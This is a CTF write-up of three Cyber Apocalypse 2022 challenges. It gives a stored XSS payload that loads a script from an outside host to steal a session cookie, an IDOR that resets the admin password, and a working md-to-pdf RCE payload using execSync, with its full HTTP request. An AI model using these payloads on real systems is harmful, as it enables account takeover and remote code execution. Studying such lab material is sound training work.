Cyber Apocalypse CTF 2022 — Intergalactic Chase Write up
Hello everyone I am Hac and today we are doing Cyber Apocalypse CTF 2022 , Specifically these challenges :-
- Kryptos Support (Web)
- BlinkerFluids (web)
- Compressor (Misc)We will first start with Kryptos Support (Web) . Let’ s go ………
On visiting the page , We see that there is and input field where we can give some input after that it’s checked by the admin (it’s like a reporting system where our report will be checked by the admin user or some other group of user ) .
I was wondering what I can do with this , I have played good amount of CTF’s (still a noob) So I thought to try XSS but not your traditional alert(1) , Since things are not happening at our side we need to know whether our payload is working or not . That’s why I am using XSShunter there are other-ways to do this work but I will stick with XSShunter . This is our payload 🢃
"><script src=https://someone-in-somewhere-redacted.com></script>
And boom our XSS payload fired I was wondering what I can do from here ? One thing was really interesting for me we are able to get cookie . Which could be of admin or some other user with same or slightly lower privilege .
Since we don't have any cookie at our side that’s why cookie was interesting to me .
##### Cookies (Non-HTTPOnly)
`session=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Im1vZGVyYXRvciIsInVpZCI6MTAwLCJpYXQiOjE2NTI1MzQ4ODV9.JO12yEA44QxXgfUmL3n6Sm4Et2AJc5rkvXkvSMdmFOI`Now we can add that cookie in our browser .
After that we will navigate to /tickets (Thanks to my amazing team member KDirectorate) .
I was wondering what i can do here the page seems to be static (except few stuff) . I tried /rfid/somenumbers and all but no luck
Then one of my team mate (KDirectorate) said to “check /setting which has password reset functionality ” which was really interesting . I navigated to /setting and intercepted the response in burp suite .
There was the filed one was “password” and othere was “uid” (which was like username ) .
Then I thought what if I change to value of uid with 1 ? ( Most of the time 1=admin)
And boom I was able to change password of admin . After that I tried to login as admin and I was successful .
BlinkerFluids (web)
In this challenge there is a RCE in md-to-pdf which we will use to get the flag (Thanks KDirectorate ) If we check challenge file we will come across 🢃
'--no-sandbox', '--js-flags=--noexpose_wasm,--jitless
Here no “ — no-sandbox ” means that we have access to host environment .
Some resources which i used to learn about this exploit
So we will intercept the response in burp suite and I will add my payload .
---js\n((require('child_process')).execSync('id > /tmp/RCE.txt'))\n---RCE
And we are able to execute our code
POST /api/invoice/add HTTP/1.1
Host: 46.101.27.51:32374
Content-Length: 24
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Content-Type: application/json
Accept: */*
Origin: http://46.101.27.51:32374
Referer: http://46.101.27.51:32374/
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Connection: close{"markdown_content":"---js\n((require('child_process')).execSync('ls > static/RCE.txt'))\n---RCE"}
We can get flag by simple enumeration .
Compressor (Misc)
In this challenge we will take advantage of command injection to get flag .
This one is easy so I will go quick
we are able to execute different command and with simple enumeration we can find the flag .
